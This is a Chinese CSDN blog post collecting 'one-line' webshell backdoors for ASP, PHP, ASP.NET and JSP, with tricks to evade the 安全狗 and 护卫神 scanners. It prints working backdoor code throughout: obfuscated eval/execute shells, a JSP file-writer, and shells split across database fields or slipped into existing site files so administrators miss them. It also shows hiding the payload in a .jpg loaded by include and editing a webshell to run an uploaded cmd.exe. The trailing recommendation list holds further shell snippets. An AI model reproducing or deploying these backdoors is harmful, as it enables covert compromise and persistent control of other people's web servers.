免杀一句话 - cracer_CSDN

于 2023-07-14 21:24:48 发布
阅读量115 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67888657/article/details/131731691
版权
文章介绍了各种Web编程语言中创建后门的方法,包括ASP、PHP、ASP.NET和JSP的一句话木马示例,以及如何通过变形和使用外部文件来规避安全检测。同时,提到了如何在有权限限制的情况下执行命令,以及如何修改WebShell以避免被检测到。
摘要由CSDN通过智能技术生成

<%a=request("gold")%><%eval a%>

一句话

就有

过安全狗  和护卫神的

不外传。谢谢

<%execute(request("cmd"))%>

<%execute request("1")%>

ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾  密码a

php下的一句话

<?php eval($_POST[cmd];?>

asp.net下的

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>

jsp下的

<%

if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());

%>

PHP过安全狗一句话:

fuck<?php 

eval

($_POST

[a])

?>

该日志目录不存在或权限不足,请检查设置!<?php 

eval

($_POST

[a])

?>

ASP过安全狗一句话密码(pass)

<%ShiSan=")╁ssap╁(TSeUQeR LavE"

ExeCuTe(ShiSanFun(ShiSan))

dim ShiSan,ShiSanNewstr,ShiSanI

Function ShiSanFun(ShiSanObjstr)

ShiSanObjstr = Replace(ShiSanObjstr, "╁", """")

For ShiSanI = 1 To Len(ShiSanObjstr)

 If Mid(ShiSanObjstr, ShiSanI, 1) <> "╋" Then

  ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr

 Else

  ShiSanNewStr = vbCrLf & ShiSanNewStr

 End If

Next

ShiSanFun = ShiSanNewStr

End Function%>

原来代码是<%execute request("cmd")%>   把标签修改替换下来 为

  <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 这样就避开了<%,%>符号!

  表中数据段限制,一句话木马也写不下的情况

  网络中流传的最小的木马代码是<%eval request("#")%> 如过连这也写不下怎么办?

  将木马分开写就好了!   <%Y=request("x")%> <%execute(Y)%>   这样分开写提交到数据库就没问题了!

  不过,在ACCESS数据库中新增加的数据物理位置是在旧数据之前的,所以要先写<%execute(Y)%>部分。写好后在客户端写密码时除了填写"x"以外的任何字符都可以,如果填了"x"就会出错!

  插入一句话容易爆错

  例如

  Sub unlockPost()

  Dim id,replyid,rs,posttable

  id=Request("id")

  replyid=Request("replyid")

  If Not IsNumeric(id) or id="" Then

  写成

  Sub unlockPost(<%eval request("#")%>)

  Dim id,replyid,rs,posttable

  id=Request("id")

  replyid=Request("replyid")

  If Not IsNumeric(id) or id="" Then

  就可以了,也可以写成带容错语句的格式!!

  <%if request("cmd")<>""then execute request("cmd")%>

  一句话木马到两句话木马的转型!

  一句话木马服务端原型:<%execute request("value")%> ,

  变形后:<%On Error Resume Next execute request("value")%> ,

  至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.

  我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.

  这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.

  现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.

  当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.

  一句话免杀:

  一:变形法

  比如:eval(request("#"))这样的马儿呢,一般情况下是不被杀的。但实际上,经常杀毒软件会把eval(request列为特征码。所以我们变形一下

  E=request("id")

  eval(E)

  这样可达到免杀的目的。

  例如:<%execute request("1")%>       变形后:

  <%E=request("1")

  execute E%>

  当然,这种变形是最好做的。

  介绍第二种方法:因为很多管理员很聪明,它会检查ASP文件中的execute和eval函数。所以呢,不管你怎么反编译,它最终总是要用其中的一个函数来解释运行,所以还是被发现了。好么,我们用外部文件来调用。建一个a.jpg或者任何不被发现的文件后缀或文件名。写入 execute(request("#"))当然,你可以先变形后现放上去。然后在ASP文件中插入

  <!--#include file="a.jpg" -->

  来引用它,即可。

  不过,管理员可以通过对比文件的方式找到修改过的文件,不过这种情况不多。

  在WEBSHeLL中使用命令提示

  在使用ASP站长助手6.0时点击命令提示符显示“没有权限”的时候,可以使用ASP站长助手上传CMD.exe到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来),再修改你的WEBSHELL找到调用CMD.EXE的代码。原来的代码如下

  .exec("cmd.exe /c "&DefCmd).stdout.readall

  修改为

  .exec("你想上传的cmd.exe绝对路径" /c"&DefCmd).stdout.readall

  比如你上传到的目录是D:\web\www\cmd.exe,那么就修改成

  .exec("D:\web\www\cmd.exe /c"&DefCmd).stdout.readall

创心域技术网
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
ASP免杀大马
10-02
ASP免杀大马
webshell免杀小工具
wo41ge的博客
12-25 578
ASP绕过 相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。 但是依然有不少方法可以绕过 首先asp的一句话木马如下: <%execute(request("x"))%> 使用函数分割关键字 <% Function b(): b = request("x") End Function Function a(): eXecUTe(b()) End Function a() %> 连接密码:x 批量脚本 import r
免杀ASP一句话
weixin_34148340的博客
11-26 1000
<% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function UnEncode(cc) for i = 1 to len(cc) if mid(cc,i,1)<>"日" then temp = Mid(cc, i, 1) + temp ...
asp-Webshell免杀
weixin_44110913的博客
08-23 3386
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。 编号 名称 参考链接 1 网站安全狗(.
一句话木马变种免杀
qq_42133828的博客
12-31 3233
常见的免杀方式:     字符串拼接     多方式传参免杀     回调函数     远程木马     伪协议后门     函数特性 字符串拼接免杀:     &lt;?php         $str = "abcdefs";         $s = substr($str,-1,1);         $ev = 'a' . $s . 'sert';         $...
asp一句话
callmeevil的专栏
06-24 466
各类一句话木马免杀集合
joke_ljh的博客
10-10 2335
各类一句话木马免杀集合,基本过D盾与安全狗,php、asp、aspx、jsp一句话和冰蝎,我写的文章链接如下: https://www.cnblogs.com/joke-ljh/p/13794125.html
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
webshell:免杀webshell生成工具
04-13
webshell v2.0 仅供学习 请勿用作非法用途 更新了部分规则,现在可以绕过包括但不仅限于D盾、webdir+、河马、安全狗等查杀工具 项目适配了asp、aspx、php语言 免杀webshell生成工具 知识点:使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数 blog: command:python php_webshell.py 知识点:使用分隔关键字等绕过 blog: 知识点:使用自定义加密绕过杀软拼接关键字 blog: 知识点:利用函数分隔关键字 更新日志 2021/2/12 由于D盾增加规则 将 if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e") 作为匹配规则 所以更新专用于D盾的webshell生成器 php_D_webshell.py 只用注释依然可以过D盾 其他生成器不受影响
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
免杀一句话
cc1988429的专栏
04-18 2426
0x01:ASP一句话 1. 2. 3. 0x02:免杀大部分网站的一句话 4. 0x03:免杀部分网站过略的一句话 5.executerequest("x") 0x04:免杀部分网站过略双引号的一句话 6. 0x05:php一句话 7. 0x06:aspx一句话 8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
ASP WebShell 后门脚本与免杀
悦分享
08-01 2013
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。......
ASP一句话***客户端
weixin_34092455的博客
10-28 418
4年前写过的一个小小的***利用程序。可以调用XMLHTTP控件让服务器从网上下载ASP***并保存在服务器上!可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍!<HTML><HEAD><TITLE>ASP一句话客户端</TITLE> <METAhttp-equiv=Content-Typecontent...
过d盾asp webshell+冰蝎免杀马探讨
goddemon
07-19 2434
正文asp免杀的手法其实也蛮多的个人理解其实免杀核心就是混淆+改变执行顺序啥的。对于asp而言,前者的利用特征这些进行绕后者就是利用函数数组+类的手法个人后者的手法用的最多一样吧这里先扔2个bypass的小马。...
史上最全一句话木马
hackzkaq的博客
06-29 7855
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
cracer安全工具包v8
最新发布
12-04
Cracer安全工具包v8是一款功能强大的安全工具包,旨在帮助用户提升网络安全防护能力。该工具包集成了多种功能模块,包括网络扫描、漏洞分析、数据加密等功能,可以满足用户在日常安全防护中的各种需求。 该工具包以其丰富的功能和简洁易用的操作界面而闻名。用户可以通过该工具包对网络进行全面扫描,发现潜在的安全漏洞,并进行漏洞分析和修复。同时,用户还可以使用数据加密模块对重要数据进行加密存储,提高数据的安全性。 除此之外,Cracer安全工具包v8还支持实时监控网络流量,及时发现异常流量并进行处理。同时,用户还可以使用该工具包对网络访问进行限制,加强对网络的安全管控。 总的来说,Cracer安全工具包v8是一款全方位的网络安全防护工具,可以帮助用户提升网络安全防护能力,保护个人和机构的数据安全。它的强大功能和简洁易用的操作界面使其成为了用户们的最佳选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值